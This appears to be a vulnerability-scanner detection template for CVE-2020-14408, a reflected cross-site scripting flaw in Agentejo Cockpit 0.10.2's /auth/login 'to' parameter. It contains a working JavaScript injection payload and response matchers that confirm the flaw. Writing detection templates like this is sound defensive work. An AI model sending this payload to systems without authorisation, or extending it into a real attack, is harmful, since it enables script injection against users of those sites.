id: CVE-2020-14408 info: name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-score: 0.00113 metadata: max-request: 1 verified: true tags: cve,cve2020,cockpit,agentejo,xss,oss http: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" matchers-condition: and matchers: - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';" - type: word part: header words: - "text/html" - type: status status: - 200 # Enhanced by mp on 2022/09/02